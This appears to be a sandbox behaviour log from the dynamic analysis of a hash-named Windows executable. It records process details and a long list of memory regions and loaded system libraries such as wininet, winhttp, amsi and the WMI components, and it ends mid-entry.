# Flog Txt Version 1 # Analyzer Version: 2023.1.0 # Analyzer Build Date: Jan 31 2023 05:27:17 # Log Creation Date: 20.03.2023 12:03:08.019 Process: id = "1" image_name = "a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe" filename = "c:\\users\\oqxzraykm\\desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe" page_root = "0x446f3000" os_pid = "0x1604" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0xa48" cmd_line = "\"C:\\Users\\OqXZRaykm\\Desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe\" " cur_dir = "C:\\Users\\OqXZRaykm\\Desktop\\" os_username = "PXTHFFRYO7\\OqXZRaykm" bitness = "32" os_groups = "PXTHFFRYO7\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00019d83" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 127 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 128 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 129 start_va = 0x40000 end_va = 0x5cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 130 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 131 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 132 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 133 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 134 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 135 start_va = 0x400000 end_va = 0x4acfff monitored = 1 entry_point = 0x402f11 region_type = mapped_file name = "a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe" filename = "\\Users\\OqXZRaykm\\Desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe" (normalized: "c:\\users\\oqxzraykm\\desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe") Region: id = 136 start_va = 0x77840000 end_va = 0x779e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 137 start_va = 0x7ffa0000 end_va = 0x7ffa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffa0000" filename = "" Region: id = 138 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 139 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 140 start_va = 0x7fff0000 end_va = 0xffffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 141 start_va = 0x7ffc14690000 end_va = 0x7ffc14883fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 294 start_va = 0x7ff90000 end_va = 0x7ff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff90000" filename = "" Region: id = 295 start_va = 0x7ff70000 end_va = 0x7ff80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff70000" filename = "" Region: id = 296 start_va = 0x4b0000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 297 start_va = 0x7ffc14510000 end_va = 0x7ffc14568fff monitored = 0 entry_point = 0x7ffc14528ff0 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 298 start_va = 0x7ffc139f0000 end_va = 0x7ffc13a72fff monitored = 0 entry_point = 0x7ffc139ffb00 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 299 start_va = 0x77830000 end_va = 0x77839fff monitored = 0 entry_point = 0x778312e0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 300 start_va = 0x7ff60000 end_va = 0x7ff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 301 start_va = 0x7ff50000 end_va = 0x7ff58fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff50000" filename = "" Region: id = 302 start_va = 0x560000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 303 start_va = 0x77130000 end_va = 0x7721ffff monitored = 0 entry_point = 0x7714f5a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 304 start_va = 0x77310000 end_va = 0x77522fff monitored = 0 entry_point = 0x77424030 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 305 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 306 start_va = 0x7fe50000 end_va = 0x7ff4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fe50000" filename = "" Region: id = 307 start_va = 0x6f0000 end_va = 0x7b8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 308 start_va = 0x75070000 end_va = 0x7510efff monitored = 0 entry_point = 0x750a85c0 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 309 start_va = 0x7fa70000 end_va = 0x7fe4cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\apppatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 310 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 311 start_va = 0x75750000 end_va = 0x758e3fff monitored = 0 entry_point = 0x75789860 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 312 start_va = 0x77220000 end_va = 0x77237fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\SysWOW64\\win32u.dll" (normalized: "c:\\windows\\syswow64\\win32u.dll") Region: id = 313 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 314 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 315 start_va = 0x77240000 end_va = 0x77262fff monitored = 0 entry_point = 0x772473c0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 316 start_va = 0x76910000 end_va = 0x769eafff monitored = 0 entry_point = 0x7696fc10 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\SysWOW64\\gdi32full.dll" (normalized: "c:\\windows\\syswow64\\gdi32full.dll") Region: id = 317 start_va = 0x77530000 end_va = 0x775aafff monitored = 0 entry_point = 0x77547800 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\SysWOW64\\msvcp_win.dll" (normalized: "c:\\windows\\syswow64\\msvcp_win.dll") Region: id = 318 start_va = 0x76ac0000 end_va = 0x76bdffff monitored = 0 entry_point = 0x76aeb170 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 319 start_va = 0x30000 end_va = 0x37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 320 start_va = 0x4b0000 end_va = 0x4d2fff monitored = 0 entry_point = 0x4b4410 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 321 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 322 start_va = 0x8c0000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 323 start_va = 0x75720000 end_va = 0x75744fff monitored = 0 entry_point = 0x75724410 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 324 start_va = 0xac0000 end_va = 0xc40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 325 start_va = 0xc50000 end_va = 0x2050fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c50000" filename = "" Region: id = 326 start_va = 0x2060000 end_va = 0x222ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 327 start_va = 0x70fb0000 end_va = 0x70fb5fff monitored = 0 entry_point = 0x70fb14a0 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 328 start_va = 0x2230000 end_va = 0x2a2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002230000" filename = "" Region: id = 329 start_va = 0x4b0000 end_va = 0x4b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 330 start_va = 0x4b0000 end_va = 0x4b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 331 start_va = 0x4b0000 end_va = 0x4bafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 332 start_va = 0x4c0000 end_va = 0x4c9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 333 start_va = 0x76390000 end_va = 0x76408fff monitored = 0 entry_point = 0x763a1a00 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 334 start_va = 0x76be0000 end_va = 0x76c9efff monitored = 0 entry_point = 0x76c15ac0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 335 start_va = 0x767f0000 end_va = 0x76864fff monitored = 0 entry_point = 0x7680f710 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 336 start_va = 0x76100000 end_va = 0x761b9fff monitored = 0 entry_point = 0x7613a2c0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 337 start_va = 0x2230000 end_va = 0x241ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 338 start_va = 0x6fc80000 end_va = 0x6fd3efff monitored = 0 entry_point = 0x6fc91dfc region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\SysWOW64\\msvcr100.dll" (normalized: "c:\\windows\\syswow64\\msvcr100.dll") Region: id = 339 start_va = 0x2060000 end_va = 0x21dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 340 start_va = 0x2220000 end_va = 0x222ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 341 start_va = 0x2420000 end_va = 0x296ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 342 start_va = 0x1c0000 end_va = 0x1c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 343 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 344 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 345 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 346 start_va = 0x1e0000 end_va = 0x1ecfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 347 start_va = 0x76870000 end_va = 0x7690afff monitored = 0 entry_point = 0x768a5a20 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 348 start_va = 0x76460000 end_va = 0x766dffff monitored = 0 entry_point = 0x7659a960 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 349 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 350 start_va = 0x2060000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 351 start_va = 0x21d0000 end_va = 0x21dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 352 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 353 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 354 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 355 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 356 start_va = 0x2230000 end_va = 0x2311fff monitored = 0 entry_point = 0x225c600 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 357 start_va = 0x2410000 end_va = 0x241ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 358 start_va = 0x2970000 end_va = 0x2e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 359 start_va = 0x775f0000 end_va = 0x776d2fff monitored = 0 entry_point = 0x7761c600 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 360 start_va = 0x756c0000 end_va = 0x756cefff monitored = 0 entry_point = 0x756c4830 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 361 start_va = 0x776e0000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77710900 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 362 start_va = 0x75280000 end_va = 0x752f3fff monitored = 0 entry_point = 0x752b7550 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 363 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 364 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 365 start_va = 0x75250000 end_va = 0x75270fff monitored = 0 entry_point = 0x7525ca40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 366 start_va = 0x76410000 end_va = 0x76454fff monitored = 0 entry_point = 0x76427870 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 367 start_va = 0x2e80000 end_va = 0x31b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 368 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 369 start_va = 0x76770000 end_va = 0x767edfff monitored = 0 entry_point = 0x767dbd50 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 370 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 371 start_va = 0x70fa0000 end_va = 0x70facfff monitored = 0 entry_point = 0x70fa3550 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 372 start_va = 0x75f90000 end_va = 0x75ff2fff monitored = 0 entry_point = 0x75f94b40 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 373 start_va = 0x6fc10000 end_va = 0x6fc78fff monitored = 0 entry_point = 0x6fc2c930 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 779 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 780 start_va = 0x2230000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 781 start_va = 0x2160000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 782 start_va = 0x2420000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 783 start_va = 0x2560000 end_va = 0x296ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 784 start_va = 0x21e0000 end_va = 0x221ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 785 start_va = 0x2970000 end_va = 0x2a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 786 start_va = 0x2a70000 end_va = 0x2e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 787 start_va = 0x21a0000 end_va = 0x21a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021a0000" filename = "" Region: id = 788 start_va = 0x21b0000 end_va = 0x21b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 789 start_va = 0x21c0000 end_va = 0x21c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 790 start_va = 0x6fc00000 end_va = 0x6fc0ffff monitored = 0 entry_point = 0x6fc090e0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 791 start_va = 0x6fb30000 end_va = 0x6fbf8fff monitored = 0 entry_point = 0x6fb642f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 792 start_va = 0x6fb20000 end_va = 0x6fb2ffff monitored = 0 entry_point = 0x6fb28cd0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 793 start_va = 0x75660000 end_va = 0x75684fff monitored = 0 entry_point = 0x75668820 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 794 start_va = 0x75190000 end_va = 0x751a7fff monitored = 0 entry_point = 0x7519a250 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 795 start_va = 0x21a0000 end_va = 0x21a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 796 start_va = 0x6fae0000 end_va = 0x6fb17fff monitored = 0 entry_point = 0x6fb03160 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files (x86)\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files (x86)\\windows defender\\mpoav.dll") Region: id = 797 start_va = 0x75690000 end_va = 0x75697fff monitored = 0 entry_point = 0x75691800 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 800 start_va = 0x2330000 end_va = 0x2338fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002330000" filename = "" Region: id = 907 start_va = 0x74070000 end_va = 0x74082fff monitored = 0 entry_point = 0x74075d30 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 908 start_va = 0x71210000 end_va = 0x7123efff monitored = 0 entry_point = 0x7121bb00 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 909 start_va = 0x772f0000 end_va = 0x77308fff monitored = 0 entry_point = 0x772f93e0 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 910 start_va = 0x751e0000 end_va = 0x751e9fff monitored = 0 entry_point = 0x751e2a60 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 911 start_va = 0x74220000 end_va = 0x74677fff monitored = 0 entry_point = 0x745422f0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 912 start_va = 0x74e40000 end_va = 0x75069fff monitored = 0 entry_point = 0x74ff94e0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 913 start_va = 0x766e0000 end_va = 0x76766fff monitored = 0 entry_point = 0x76722d70 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 914 start_va = 0x74680000 end_va = 0x74c82fff monitored = 0 entry_point = 0x7485ae30 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 915 start_va = 0x751b0000 end_va = 0x751d2fff monitored = 0 entry_point = 0x751b8580 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\SysWOW64\\wldp.dll" (normalized: "c:\\windows\\syswow64\\wldp.dll") Region: id = 916 start_va = 0x2330000 end_va = 0x2330fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002330000" filename = "" Region: id = 917 start_va = 0x2340000 end_va = 0x2340fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002340000" filename = "" Region: id = 918 start_va = 0x75160000 end_va = 0x75171fff monitored = 0 entry_point = 0x75164620 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 919 start_va = 0x75590000 end_va = 0x75652fff monitored = 0 entry_point = 0x755d8980 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 920 start_va = 0x2350000 end_va = 0x238ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 921 start_va = 0x31c0000 end_va = 0x32bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 922 start_va = 0x741c0000 end_va = 0x74211fff monitored = 0 entry_point = 0x741c9e70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 923 start_va = 0x75120000 end_va = 0x75151fff monitored = 0 entry_point = 0x7512c340 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 924 start_va = 0x75110000 end_va = 0x75117fff monitored = 0 entry_point = 0x75112220 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 925 start_va = 0x75f80000 end_va = 0x75f86fff monitored = 0 entry_point = 0x75f81d30 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 926 start_va = 0x2390000 end_va = 0x2390fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002390000" filename = "" Region: id = 927 start_va = 0x23a0000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 928 start_va = 0x32c0000 end_va = 0x33bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 929 start_va = 0x23e0000 end_va = 0x23e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023e0000" filename = "" Region: id = 930 start_va = 0x74c90000 end_va = 0x74e37fff monitored = 0 entry_point = 0x74d11b70 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 931 start_va = 0x23f0000 end_va = 0x23f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023f0000" filename = "" Region: id = 932 start_va = 0x2400000 end_va = 0x2400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002400000" filename = "" Region: id = 933 start_va = 0x710d0000 end_va = 0x7115ffff monitored = 0 entry_point = 0x710e2f70 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 934 start_va = 0x70f90000 end_va = 0x70f97fff monitored = 0 entry_point = 0x70f91960 region_type = 